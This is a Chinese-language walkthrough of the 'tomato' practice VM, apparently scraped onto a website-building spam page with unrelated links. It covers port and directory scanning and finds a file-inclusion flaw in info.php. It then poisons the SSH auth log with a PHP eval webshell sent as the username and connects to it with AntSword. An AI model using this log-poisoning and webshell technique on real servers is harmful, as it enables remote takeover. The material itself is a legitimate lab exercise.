当前位置: 首页 > news >正文

网站建设分工说明项目网站制作

网站建设分工说明,项目网站制作,app商城软件,办公空间设计网站tomato-靶机 一、安装靶机环境 下载双击.ova文件#xff0c;写文件名路径导入 打开虚拟机用NAT模式 编辑–虚拟网络编辑器查看IP段 二、信息收集 1.御剑端口扫描查找该虚拟机的IP 访问网站 扫目录 dirb http://192.168.30.130 收集到目录 /server-status /antibot_im…tomato-靶机 一、安装靶机环境 下载双击.ova文件写文件名路径导入 打开虚拟机用NAT模式 编辑–虚拟网络编辑器查看IP段 二、信息收集 1.御剑端口扫描查找该虚拟机的IP 访问网站 扫目录 dirb http://192.168.30.130 收集到目录 /server-status /antibot_image/ /index.html访问/antibot_image目录 在目录下找到info.php 查到 根目录/var/www/html 用户名:webmasterlocalhost查看info.php源代码提示image参数用于文件包含 三、漏洞渗透 写image参数linux的系统文件发现成功显示确定有文件包含漏洞 2.发现端口没有全部扫描出来使用这个命令扫描 nmap -A 192.168.30.130 -p-2211是ssl的连接端口 ssh ?php eval($_POST[cmd]);?192.168.30.130 -p 2211然后在网页端查看ubuntu报错信息/var/log/auth.log http://192.168.30.130/antibot_image/antibots/info.php?image/var/log/auth.log看到注入成功然后用蚁剑 URL地址 http://192.168.30.130/antibot_image/antibots/info.php?image/var/log/auth.log然后就可以控制整个文件
http://www.hkea.cn/news/14588563/

相关文章:

  • 学做网站需要潍坊 网站
  • 大淘客网站免费空间厦门网站设计个人
  • wordpress网站图片加载速度慢如何提高网站点击率
  • php 开源cms 企业网站辽宁手机响应式网站建设
  • 好的网站开发校园网站方案
  • dedecms免费网站模板wordpress用户修改头像
  • 做游戏网站要通过什么审核网络规划设计师证书样本
  • 北京电子商务网站建设建设银行网站首页下载
  • 检察内网门户网站建设做设计的兼职网站有哪些
  • 海外网站营销百度百家模板wordpress
  • 十堰高端网站建设国家反诈中心app下载流程
  • 适合推广的网站有哪些网站新功能演示用什么技术做的
  • 做体育最好的网站建网站前途
  • 临沂网站制作学大教育培训机构怎么样
  • 有什么网站做可以国外的生意做音乐网站的目的
  • 建设一个网站主要受哪些因素的影响深圳网络有限公司
  • 上海市网站建设公叿网络营销sem培训
  • 网站制作公透明清晰网络营销服务工具
  • 吉林建设厅网站制作企业网站与app有什么不同
  • 导购网站做基础销量网站开发蓝云
  • 网站备案加速中国建筑企业排名
  • 网站成功案例设计包装设计公司排行榜
  • 现在帮人做网站赚钱吗企业网站建设的一般要素有
  • 凡科建设网站步骤无锡全网营销方案
  • 网站建设自学视频网站可以用什么语言开发做
  • 北京建设网官方网站适合大学生创业的网站建设类型
  • 网站维护主要是做哪些呼和浩特网络推广公司
  • 浙江网站建设服务专业网页美工招聘
  • 东营网站建设制作最新cms
  • 搭建网站的主要风险软件系统开发全网优惠